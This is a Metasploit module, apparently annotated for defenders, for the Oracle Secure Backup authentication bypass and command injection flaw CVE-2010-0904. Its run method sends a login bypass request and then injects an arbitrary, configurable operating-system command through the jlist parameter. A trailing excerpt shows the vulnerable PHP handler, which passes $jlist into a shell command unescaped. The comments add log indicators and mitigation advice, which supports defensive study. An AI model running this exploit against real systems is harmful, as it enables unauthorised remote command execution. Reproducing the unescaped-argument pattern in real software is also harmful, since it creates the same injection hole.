Path: blob/master/modules/auxiliary/admin/oracle/osb_execqr3.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for the Oracle Secure Backup web interface issue tracked as
# CVE-2010-0904 / OSVDB 66338 / ZDI-10-118 (see 'References' below).
#
# What the code does, in order:
#   1. POSTs `attempt=1&uname=-` to /login.php.
#   2. If the response cookies contain a PHPSESSID, POSTs to /property_box.php
#      with `type=Job` and a `jlist` value made of '&' followed by CMD.
#
# Notes for defenders and reviewers:
#   * 'SideEffects' is declared as IOC_IN_LOGS: the two POSTs above are the
#     requests that would be visible in the web server's logs. Seeing the
#     request bodies (uname=-, jlist=...) presumably needs body logging or a
#     proxy/WAF capture -- confirm against the deployment.
#   * With the default CMD, a file named metasploit.txt is written at the root
#     of %SYSTEMDRIVE% on the target, which is a host-side artefact to look for.
#   * Mitigation is the vendor fix referenced by the CVE; limiting who can reach
#     the administrative web interface (RPORT defaults to 443 here) reduces
#     exposure.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and its options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    module_info = {
      'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
      'Description' => %q{
        This module exploits an authentication bypass vulnerability
        in login.php in order to execute arbitrary code via a command injection
        vulnerability in property_box.php. This module was tested
        against Oracle Secure Backup version 10.3.0.1.0 (Win32).
      },
      'Author' => [ 'MC' ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'CVE', '2010-0904' ],
        [ 'OSVDB', '66338'],
        [ 'ZDI', '10-118' ],
      ],
      'DisclosureDate' => '2010-07-13',
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS],
        'Reliability' => []
      }
    }
    super(update_info(info, module_info))

    # CMD is declared optional (required = false) but ships with a default that
    # only drops a marker file; SSL is on by default to match RPORT 443.
    module_options = [
      Opt::RPORT(443),
      OptString.new('CMD', [ false, 'The command to execute.', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt' ]),
      OptBool.new('SSL', [true, 'Use SSL', true]),
    ]
    register_options(module_options)
  end

  # Sends the login request and, if a session cookie comes back, the
  # property_box.php request carrying CMD.
  #
  # Both requests pass 5 as the second argument to send_request_cgi (the
  # timeout).
  def run
    command = datastore['CMD']

    login_request = {
      'uri' => '/login.php',
      'data' => 'attempt=1&uname=-',
      'method' => 'POST'
    }
    res = send_request_cgi(login_request, 5)

    # This only checks that the cookie string contains "PHPSESSID=...;". It
    # does not verify anything else about the session. A nil response (no
    # answer within the timeout) takes the same error path.
    unless res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)
      print_error('Invalid PHPSESSION token..')
      return
    end

    print_status("Sending command: #{command}...")

    # The jlist value is '&' + CMD, URI-encoded. The cookies from the login
    # response are replayed unchanged.
    job_request = {
      'uri' => '/property_box.php',
      'data' => 'type=Job&jlist=' + Rex::Text.uri_encode('&' + command),
      'cookie' => res.get_cookies,
      'method' => 'POST'
    }
    send_request_cgi(job_request, 5)

    # The response to the second request is discarded, so this message means
    # "request sent", not "command confirmed to have run".
    print_status('Done.')
  end
end

# Reference excerpt of the server-side PHP handler, kept by the module author.
# In the lines shown, every $objectname element goes through escapeshellarg(),
# but $jlist is neither initialised nor escaped before it is interpolated into
# the exec_qr() command string. How $jlist is populated from the request is not
# visible in this excerpt; the module supplies it as the `jlist` POST parameter.
# A fix on the PHP side would start $jlist from an empty value and escape every
# component that reaches the command line.
=begin
else if (strcmp($type, "Job") == 0)
{
  if (!is_array($objectname))
    $objectname = array();
  reset($objectname);
  while (list(,$oname) = each($objectname))
  {
    $oname = escapeshellarg($oname);
    $jlist = "$jlist $oname";
  }
  if (strlen($jlist) > 0)
    $msg = exec_qr("$rbtool lsjob -lrRLC $jlist");
=end